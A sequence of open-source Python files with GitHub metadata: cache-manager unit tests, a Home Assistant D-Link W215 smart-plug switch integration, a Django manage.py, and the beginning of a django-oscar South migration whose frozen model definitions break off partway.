cache.invalidate() # Should reload
self.assertEqual(cache['foo'], 'bar')
self.assertNotIn('baz', cache)
def test_delete_saved(self):
cache_name = self.check_cache_gone('delete_saved')
cache = PersistentCache(cache_name, cache_manager=self.manager, contents={ 'foo': 'bar' })
cache.delete_saved_content()
self.check_cache_gone(cache_name)
self.assertEqual(cache['foo'], 'bar') # Shouldn't delete memory
cache.load()
self.assertIsNone(cache.contents) # No content to load
cache.load_or_build()
self.assert_contents_equal(cache, {})
def test_invalidate_and_rebuild(self):
cache_name = self.check_cache_gone('invalidate_rebuild')
cache = PersistentCache(cache_name, cache_manager=self.manager, contents={ 'foo': 'bar' })
cache.save()
cache.invalidate_and_rebuild()
self.assert_contents_equal(cache, {})
cache.load() # Saved content should get replaced
self.assert_contents_equal(cache, {})
def test_load_or_build(self):
cache_name = self.check_cache_gone('load_build')
cache = CacheWrap(cache_name, cache_manager=self.manager, loader=lambda *args: ['loaded'],
builder=lambda *args: ['built'])
self.assert_contents_equal(cache, ['loaded'])
cache.load_or_build()
self.assert_contents_equal(cache, ['loaded'])
cache.loader = None
cache.load_or_build()
self.assert_contents_equal(cache, ['built'])
def test_validation(self):
cache_name = self.check_cache_gone('validation')
cache = PersistentCache(cache_name, cache_manager=self.manager, contents={ 'foo': 'bar' },
validator=lambda *args: False, builder=lambda *args: ['built'])
cache.save()
cache.load_or_build() # Invalid load, force rebuild
self.assert_contents_equal(cache, ['built'])
cache[0] = 'changed'
cache.save()
cache.validator = lambda *args: True
cache.load()
self.assert_contents_equal(cache, ['changed'])
# Raising an exception in validator should invalidate the cache
cache.validator = lambda *args: args['not legal']
cache.load()
self.assert_contents_equal(cache, None)
def test_dependents(self):
dependent_cache_name = self.check_cache_gone('dependent')
dependent_cache = PersistentCache(dependent_cache_name, cache_manager=self.manager)
parent_cache_name = self.check_cache_gone('parent')
parent_cache = PersistentCache(parent_cache_name, cache_manager=self.manager, dependents=[dependent_cache])
dependent_cache['foo'] = 'bar'
parent_cache.save(True)
dependent_cache['foo'] = 'saved'
parent_cache.load(True)
self.assertEqual(dependent_cache['foo'], 'bar')
dependent_cache['foo'] = 'invalid'
parent_cache.invalidate(True)
self.assertEqual(dependent_cache['foo'], 'bar')
parent_cache.delete_saved_content(True)
parent_cache.load(True)
self.assertIsNone(dependent_cache.contents)
parent_cache.load_or_build(True)
self.assertDictEqual(dependent_cache.contents, {})
dependent_cache['foo'] = 'bar'
dependent_cache.save()
parent_cache.invalidate_and_rebuild(True)
self.assertDictEqual(dependent_cache.contents, {})
def test_pre_processor(self):
cache_name = self.check_cache_gone('pre_process')
cache = PersistentCache(cache_name, cache_manager=self.manager, contents={ 'foo': 'bar' },
pre_processor=lambda c: { 'foo2': c.get('foo', 'missing') })
self.assert_contents_equal(cache, { 'foo': 'bar' })
cache.save()
# Preprocessor should have applied to save, but not cache
self.assert_contents_equal(cache, { 'foo': 'bar' })
cache.load() # Load the preprocessor changes
self.assert_contents_equal(cache, { 'foo2': 'bar' })
def test_post_processor(self):
cache_name = self.check_cache_gone('post_process')
cache = PersistentCache(cache_name, cache_manager=self.manager, contents={ 'foo': 'bar' },
post_processor=lambda c: { 'foo2': c.get('foo', 'missing') })
self.assert_contents_equal(cache, { 'foo': 'bar' })
cache.save()
# Postprocessor should not have applied to save or cache
self.assert_contents_equal(cache, { 'foo': 'bar' })
cache.load() # Load and apply postprocessor changes
self.assert_contents_equal(cache, { 'foo2': 'bar' })
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "45a6a43d77533e8765b0ff04423c8e4d",
"timestamp": "",
"source": "github",
"line_count": 255,
"max_line_length": 115,
"avg_line_length": 39.627450980392155,
"alnum_prop": 0.6120732310737259,
"repo_name": "OpenGov/py_cache_manager",
"id": "6b655fdbfefd50101aa7f113eb4779dc565c227e",
"size": "10142",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/wrap_tests.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "81551"
}
],
"symlink_target": ""
}
|
"""Support for D-Link W215 smart switch."""
from datetime import timedelta
import logging
import urllib
from pyW215.pyW215 import SmartPlug
import voluptuous as vol
from homeassistant.components.switch import PLATFORM_SCHEMA, SwitchDevice
from homeassistant.const import (
ATTR_TEMPERATURE,
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_USERNAME,
TEMP_CELSIUS,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.util import dt as dt_util
_LOGGER = logging.getLogger(__name__)
ATTR_TOTAL_CONSUMPTION = "total_consumption"
CONF_USE_LEGACY_PROTOCOL = "use_legacy_protocol"
DEFAULT_NAME = "D-Link Smart Plug W215"
DEFAULT_PASSWORD = ""
DEFAULT_USERNAME = "admin"
SCAN_INTERVAL = timedelta(minutes=2)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_PASSWORD, default=DEFAULT_PASSWORD): cv.string,
vol.Required(CONF_USERNAME, default=DEFAULT_USERNAME): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_USE_LEGACY_PROTOCOL, default=False): cv.boolean,
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up a D-Link Smart Plug."""
host = config.get(CONF_HOST)
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
use_legacy_protocol = config.get(CONF_USE_LEGACY_PROTOCOL)
name = config.get(CONF_NAME)
smartplug = SmartPlug(host, password, username, use_legacy_protocol)
data = SmartPlugData(smartplug)
add_entities([SmartPlugSwitch(hass, data, name)], True)
class SmartPlugSwitch(SwitchDevice):
"""Representation of a D-Link Smart Plug switch."""
def __init__(self, hass, data, name):
"""Initialize the switch."""
self.units = hass.config.units
self.data = data
self._name = name
@property
def name(self):
"""Return the name of the Smart Plug."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes of the device."""
try:
ui_temp = self.units.temperature(int(self.data.temperature), TEMP_CELSIUS)
temperature = ui_temp
except (ValueError, TypeError):
temperature = None
try:
total_consumption = float(self.data.total_consumption)
except (ValueError, TypeError):
total_consumption = None
attrs = {
ATTR_TOTAL_CONSUMPTION: total_consumption,
ATTR_TEMPERATURE: temperature,
}
return attrs
@property
def current_power_w(self):
"""Return the current power usage in Watt."""
try:
return float(self.data.current_consumption)
except (ValueError, TypeError):
return None
@property
def is_on(self):
"""Return true if switch is on."""
return self.data.state == "ON"
def turn_on(self, **kwargs):
"""Turn the switch on."""
self.data.smartplug.state = "ON"
def turn_off(self, **kwargs):
"""Turn the switch off."""
self.data.smartplug.state = "OFF"
def update(self):
"""Get the latest data from the smart plug and updates the states."""
self.data.update()
@property
def available(self) -> bool:
"""Return True if entity is available."""
return self.data.available
class SmartPlugData:
"""Get the latest data from smart plug."""
def __init__(self, smartplug):
"""Initialize the data object."""
self.smartplug = smartplug
self.state = None
self.temperature = None
self.current_consumption = None
self.total_consumption = None
self.available = False
self._n_tried = 0
self._last_tried = None
def update(self):
"""Get the latest data from the smart plug."""
if self._last_tried is not None:
            minutes_since_last_try = (dt_util.now() - self._last_tried).total_seconds() / 60
            retry_minutes = min(self._n_tried * 2, 10) - minutes_since_last_try
            if self._n_tried > 0 and retry_minutes > 0:
                _LOGGER.warning("Waiting %s min to retry", retry_minutes)
return
_state = "unknown"
try:
self._last_tried = dt_util.now()
_state = self.smartplug.state
except urllib.error.HTTPError:
_LOGGER.error("D-Link connection problem")
if _state == "unknown":
self._n_tried += 1
self.available = False
_LOGGER.warning("Failed to connect to D-Link switch")
return
self.state = _state
self.available = True
self.temperature = self.smartplug.temperature
self.current_consumption = self.smartplug.current_consumption
self.total_consumption = self.smartplug.total_consumption
self._n_tried = 0
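# Hedged worked example of the back-off in SmartPlugData.update() (not
# part of the original component): after n consecutive failures the next
# poll is deferred min(2 * n, 10) minutes, so failures 1..5 wait
# 2, 4, 6, 8 and 10 minutes, and every later failure waits 10.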
|
{
"content_hash": "bc2b3d1bedd1006c8b815b2125f0dfc1",
"timestamp": "",
"source": "github",
"line_count": 167,
"max_line_length": 86,
"avg_line_length": 29.748502994011975,
"alnum_prop": 0.6217793880837359,
"repo_name": "postlund/home-assistant",
"id": "7fa391e8060619177b9a429f0dfff9ffbcb66921",
"size": "4968",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/dlink/switch.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "20215859"
},
{
"name": "Shell",
"bytes": "6663"
}
],
"symlink_target": ""
}
|
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "alpha.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
{
"content_hash": "52317a2eabbc1d93c7b08d92503fe488",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 69,
"avg_line_length": 25.11111111111111,
"alnum_prop": 0.7079646017699115,
"repo_name": "appdotnet/alpha",
"id": "814bc1d89a57d2d1ebc01659d713e0c5cd6c98b0",
"size": "248",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "manage.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "517287"
},
{
"name": "JavaScript",
"bytes": "314082"
},
{
"name": "Python",
"bytes": "223885"
}
],
"symlink_target": ""
}
|
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
from oscar.core.compat import AUTH_USER_MODEL, AUTH_USER_MODEL_NAME
class Migration(SchemaMigration):
def forwards(self, orm):
db.rename_column(u'order_order', 'basket_alt_id', 'basket_id')
def backwards(self, orm):
db.rename_column(u'order_order', 'basket_id', 'basket_alt_id')
models = {
u'address.country': {
'Meta': {'ordering': "('-display_order', 'name')", 'object_name': 'Country'},
'display_order': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0', 'db_index': 'True'}),
'is_shipping_country': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'iso_3166_1_a2': ('django.db.models.fields.CharField', [], {'max_length': '2', 'primary_key': 'True'}),
'iso_3166_1_a3': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'db_index': 'True'}),
'iso_3166_1_numeric': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'printable_name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
AUTH_USER_MODEL: {
'Meta': {'object_name': AUTH_USER_MODEL_NAME},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'basket.basket': {
'Meta': {'object_name': 'Basket'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_merged': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_submitted': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'baskets'", 'null': 'True', 'to': u"orm['{}']".format(AUTH_USER_MODEL)}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Open'", 'max_length': '128'}),
'vouchers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['voucher.Voucher']", 'null': 'True', 'blank': 'True'})
},
u'catalogue.attributeentity': {
'Meta': {'object_name': 'AttributeEntity'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entities'", 'to': u"orm['catalogue.AttributeEntityType']"})
},
u'catalogue.attributeentitytype': {
'Meta': {'object_name': 'AttributeEntityType'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'})
},
u'catalogue.attributeoption': {
'Meta': {'object_name': 'AttributeOption'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'options'", 'to': u"orm['catalogue.AttributeOptionGroup']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'option': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'catalogue.attributeoptiongroup': {
'Meta': {'object_name': 'AttributeOptionGroup'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
u'catalogue.category': {
'Meta': {'ordering': "['full_name']", 'object_name': 'Category'},
'depth': ('django.db.models.fields.PositiveIntegerField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'full_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'})
},
u'catalogue.option': {
'Meta': {'object_name': 'Option'},
'code': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'Required'", 'max_length': '128'})
},
u'catalogue.product': {
'Meta': {'ordering': "['-date_created']", 'object_name': 'Product'},
'attributes': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.ProductAttribute']", 'through': u"orm['catalogue.ProductAttributeValue']", 'symmetrical': 'False'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.Category']", 'through': u"orm['catalogue.ProductCategory']", 'symmetrical': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_discountable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'variants'", 'null': 'True', 'to': u"orm['catalogue.Product']"}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'products'", 'null': 'True', 'to': u"orm['catalogue.ProductClass']"}),
'product_options': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'rating': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'recommended_products': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.Product']", 'symmetrical': 'False', 'through': u"orm['catalogue.ProductRecommendation']", 'blank': 'True'}),
'related_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'relations'", 'blank': 'True', 'to': u"orm['catalogue.Product']"}),
'score': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
'status': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '128', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'upc': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
u'catalogue.productattribute': {
'Meta': {'ordering': "['code']", 'object_name': 'ProductAttribute'},
'code': ('django.db.models.fields.SlugField', [], {'max_length': '128'}),
'entity_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.AttributeEntityType']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'option_group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.AttributeOptionGroup']", 'null': 'True', 'blank': 'True'}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'attributes'", 'null': 'True', 'to': u"orm['catalogue.ProductClass']"}),
'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '20'})
},
u'catalogue.productattributevalue': {
'Meta': {'object_name': 'ProductAttributeValue'},
'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.ProductAttribute']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attribute_values'", 'to': u"orm['catalogue.Product']"}),
'value_boolean': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'value_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'value_entity': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.AttributeEntity']", 'null': 'True', 'blank': 'True'}),
'value_file': ('django.db.models.fields.files.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'value_float': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'value_image': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'value_integer': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'value_option': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.AttributeOption']", 'null': 'True', 'blank': 'True'}),
'value_richtext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'value_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'catalogue.productcategory': {
'Meta': {'ordering': "['-is_canonical']", 'object_name': 'ProductCategory'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.Category']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_canonical': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.Product']"})
},
u'catalogue.productclass': {
'Meta': {'ordering': "['name']", 'object_name': 'ProductClass'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'options': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'requires_shipping': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
'track_stock': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
u'catalogue.productrecommendation': {
'Meta': {'object_name': 'ProductRecommendation'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'primary': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary_recommendations'", 'to': u"orm['catalogue.Product']"}),
'ranking': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'recommendation': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.Product']"})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'customer.communicationeventtype': {
'Meta': {'object_name': 'CommunicationEventType'},
'category': ('django.db.models.fields.CharField', [], {'default': "u'Order related'", 'max_length': '255'}),
'code': ('django.db.models.fields.SlugField', [], {'max_length': '128'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'email_body_html_template': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'email_body_template': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'email_subject_template': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'sms_template': ('django.db.models.fields.CharField', [], {'max_length': '170', 'null': 'True', 'blank': 'True'})
},
u'offer.benefit': {
'Meta': {'object_name': 'Benefit'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_affected_items': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['offer.Range']", 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'value': ('oscar.models.fields.PositiveDecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'})
},
u'offer.condition': {
'Meta': {'object_name': 'Condition'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['offer.Range']", 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'value': ('oscar.models.fields.PositiveDecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'})
},
u'offer.conditionaloffer': {
'Meta': {'ordering': "['-priority']", 'object_name': 'ConditionalOffer'},
'benefit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['offer.Benefit']"}),
'condition': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['offer.Condition']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'end_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_basket_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'max_discount': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'max_global_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'max_user_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'num_applications': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'num_orders': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'offer_type': ('django.db.models.fields.CharField', [], {'default': "'Site'", 'max_length': '128'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'redirect_url': ('oscar.models.fields.ExtendedURLField', [], {'max_length': '200', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128', 'unique': 'True', 'null': 'True'}),
'start_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Open'", 'max_length': '64'}),
'total_discount': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
u'offer.range': {
'Meta': {'object_name': 'Range'},
'classes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'classes'", 'blank': 'True', 'to': u"orm['catalogue.ProductClass']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'excluded_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'excludes'", 'blank': 'True', 'to': u"orm['catalogue.Product']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'included_categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'includes'", 'blank': 'True', 'to': u"orm['catalogue.Category']"}),
'included_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'includes'", 'blank': 'True', 'through': u"orm['offer.RangeProduct']", 'to': u"orm['catalogue.Product']"}),
'includes_all_products': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128', 'unique': 'True', 'null': 'True'})
},
u'offer.rangeproduct': {
'Meta': {'unique_together': "(('range', 'product'),)", 'object_name': 'RangeProduct'},
'display_order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.Product']"}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['offer.Range']"})
},
u'order.billingaddress': {
'Meta': {'object_name': 'BillingAddress'},
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['address.Country']"}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'line1': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'line2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'line3': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'line4': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'postcode': ('oscar.models.fields.UppercaseCharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'search_text': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'})
},
u'order.communicationevent': {
'Meta': {'ordering': "['-date_created']", 'object_name': 'CommunicationEvent'},
